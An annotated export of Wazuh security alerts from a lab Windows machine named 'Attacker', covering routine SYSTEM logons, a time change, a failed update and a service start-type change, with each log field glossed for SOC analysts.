data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:52:32.6925669Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43508
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  11096
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

System time changed.

🧠 What happened? System time changed.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:36.397+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:36.397+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  System time changed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60132
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'time_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.gpg13:  ['1.3', '4.13']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533896.209215
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4616
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12288
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:55:16.5362324Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43510
Incremental log record number – handy for timeline order.

data.win.system.processID:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  12620
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The system time was changed. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Process Information: Process ID: 0x1c48 Name: C:\Windows\System32\svchost.exe Previous Time: 2025-04-17T16:55:16.492136900Z New Time: 2025-04-17T16:55:16.516484900Z This event is generated when the system time is changed. It is normal for the Windows Time Service, which runs with System privilege, to change the system time on a regular basis. Other system time changes may be indicative of attempts to tamper with the computer."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-19
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  LOCAL SERVICE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.previousTime:  2025-04-17T16:55:16.4921369Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.newTime:  2025-04-17T16:55:16.5164849Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  0x1c48
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows System error event

🧠 What happened? Windows System error event

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:36.871+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:36.871+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows System error event
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61102
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'system_error']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gpg13:  ['4.3']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533896.212420
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-WindowsUpdateClient
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {945a8954-c147-4acd-923f-40c45405a658}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  20
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  13
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000028
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:47:27.8984342Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2941
Incremental log record number – handy for timeline order.

data.win.system.processID:  9648
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  14168
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  ERROR
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Installation Failure: Windows failed to install the following update with error 0x80073D02: 9NZKPSTSNW4P-Microsoft.XboxGamingOverlay."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.errorCode:  0x80073d02
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.updateTitle:  9NZKPSTSNW4P-Microsoft.XboxGamingOverlay
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.updateGuid:  {c6a13812-e71e-4775-86f7-c7f3e4982a80}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.updateRevisionNumber:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.serviceGuid:  {855e8a7c-ecb4-4ca3-b045-1dfa50104289}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:36.877+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:36.877+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  17
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533896.214327
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:55:16.6963122Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43511
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  8104
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Service startup type was changed

🧠 What happened? Service startup type was changed

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:39.016+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:39.016+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Service startup type was changed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61104
Numeric ID of the detection rule that fired.

rule.info:  This does not appear to be logged on Windows 2000
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'policy_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533899.221663
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {555908d1-a6d7-4695-8e1e-26931d2012f4}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  7040
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:51:40.0278198Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2945
Incremental log record number – handy for timeline order.

data.win.system.processID:  772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  11352
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The start type of the Windows Modules Installer service was changed from demand start to auto start."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param1:  Windows Modules Installer
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param2:  demand start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param3:  auto start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param4:  TrustedInstaller
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:39.329+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:39.329+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  18
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533899.223443
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:35.6633235Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43515
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  6624
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
